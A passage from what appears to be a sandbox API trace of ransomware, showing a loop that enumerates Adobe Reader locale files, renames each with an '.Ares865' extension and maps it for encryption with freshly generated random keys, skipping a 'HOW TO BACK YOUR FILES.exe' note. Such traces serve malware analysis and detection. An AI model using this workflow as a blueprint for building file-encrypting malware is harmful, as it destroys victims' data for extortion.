dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0060.736] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=513024) returned 1 [0060.736] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0060.736] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0060.736] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0060.736] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0060.737] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0060.737] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.737] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d700, lpName=0x0) returned 0x154 [0060.739] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d700) returned 0x420000 [0060.782] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0060.783] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0060.783] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.783] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.783] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.783] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.783] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.783] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.783] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.783] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.784] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.784] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.784] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.784] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0060.788] CloseHandle (hObject=0x154) returned 1 [0060.788] CloseHandle (hObject=0x118) returned 1 [0060.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0060.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0060.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0060.791] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x820558a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BRdlang32.CAT", cAlternateFileName="BRDLAN~1.CAT")) returned 1 [0060.791] lstrcmpiW (lpString1="BRdlang32.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.791] lstrcmpiW (lpString1="BRdlang32.CAT", lpString2="aoldtz.exe") returned 1 [0060.791] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\BRdlang32.CAT.Ares865") returned 82 [0060.791] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\BRdlang32.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\brdlang32.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\BRdlang32.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\brdlang32.cat.ares865"), dwFlags=0x1) returned 1 [0060.793] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\BRdlang32.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\brdlang32.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0060.793] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=14336) returned 1 [0060.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0060.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0060.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0060.794] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0060.794] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0060.794] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.794] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b00, lpName=0x0) returned 0x154 [0060.796] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b00) returned 0x1a0000 [0060.797] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0060.798] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0060.798] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.798] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.798] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.798] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.798] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.798] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.798] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.798] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0060.799] CloseHandle (hObject=0x154) returned 1 [0060.799] CloseHandle (hObject=0x118) returned 1 [0060.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0060.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0060.799] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0060.799] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x833145e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1fe00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Checkers.CAT", cAlternateFileName="")) returned 1 [0060.799] lstrcmpiW (lpString1="Checkers.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.799] lstrcmpiW (lpString1="Checkers.CAT", lpString2="aoldtz.exe") returned 1 [0060.799] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Checkers.CAT.Ares865") returned 81 [0060.799] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Checkers.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\checkers.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Checkers.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\checkers.cat.ares865"), dwFlags=0x1) returned 1 [0060.800] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Checkers.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\checkers.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0060.800] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=130560) returned 1 [0060.800] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0060.800] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0060.800] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0060.800] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0060.801] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0060.801] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.801] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20100, lpName=0x0) returned 0x154 [0060.803] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x20100) returned 0x420000 [0060.811] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0060.812] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0060.812] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.812] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.812] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.812] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.812] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.812] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.812] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0060.814] CloseHandle (hObject=0x154) returned 1 [0060.814] CloseHandle (hObject=0x118) returned 1 [0060.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0060.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0060.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0060.815] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x833145e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x20400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DigSig.CAT", cAlternateFileName="")) returned 1 [0060.815] lstrcmpiW (lpString1="DigSig.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.815] lstrcmpiW (lpString1="DigSig.CAT", lpString2="aoldtz.exe") returned 1 [0060.815] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\DigSig.CAT.Ares865") returned 79 [0060.815] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\DigSig.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\digsig.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\DigSig.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\digsig.cat.ares865"), dwFlags=0x1) returned 1 [0060.816] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\DigSig.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\digsig.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0060.816] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=132096) returned 1 [0060.816] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0060.816] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0060.816] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0060.816] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0060.817] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0060.817] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.817] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20700, lpName=0x0) returned 0x154 [0060.819] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x20700) returned 0x420000 [0060.825] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0060.825] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0060.825] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.825] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.826] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.826] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.826] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.826] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.826] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.826] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.826] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.826] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.826] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.826] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0060.827] CloseHandle (hObject=0x154) returned 1 [0060.827] CloseHandle (hObject=0x118) returned 1 [0060.827] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0060.827] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0060.827] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0060.828] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x833145e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DVA.CAT", cAlternateFileName="")) returned 1 [0060.828] lstrcmpiW (lpString1="DVA.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.828] lstrcmpiW (lpString1="DVA.CAT", lpString2="aoldtz.exe") returned 1 [0060.828] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\DVA.CAT.Ares865") returned 76 [0060.828] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\DVA.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\dva.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\DVA.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\dva.cat.ares865"), dwFlags=0x1) returned 1 [0060.829] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\DVA.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\dva.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0060.829] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=19456) returned 1 [0060.829] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0060.829] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0060.829] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0060.829] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0060.830] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0060.830] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.830] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4f00, lpName=0x0) returned 0x154 [0060.832] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4f00) returned 0x1a0000 [0060.833] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0060.833] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0060.833] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.833] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.834] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.834] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.834] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.834] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.834] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.834] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0060.834] CloseHandle (hObject=0x154) returned 1 [0060.834] CloseHandle (hObject=0x118) returned 1 [0060.834] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0060.834] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0060.835] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0060.835] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x833608a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eBook.CAT", cAlternateFileName="")) returned 1 [0060.835] lstrcmpiW (lpString1="eBook.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.835] lstrcmpiW (lpString1="eBook.CAT", lpString2="aoldtz.exe") returned 1 [0060.835] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\eBook.CAT.Ares865") returned 78 [0060.835] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\eBook.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ebook.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\eBook.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ebook.cat.ares865"), dwFlags=0x1) returned 1 [0060.836] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\eBook.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ebook.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0060.836] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=6656) returned 1 [0060.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0060.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0060.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0060.836] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0060.837] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0060.837] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.837] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d00, lpName=0x0) returned 0x154 [0060.839] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d00) returned 0x1a0000 [0060.840] CryptAcquireContextW (in: phProv=0x2e2d264, 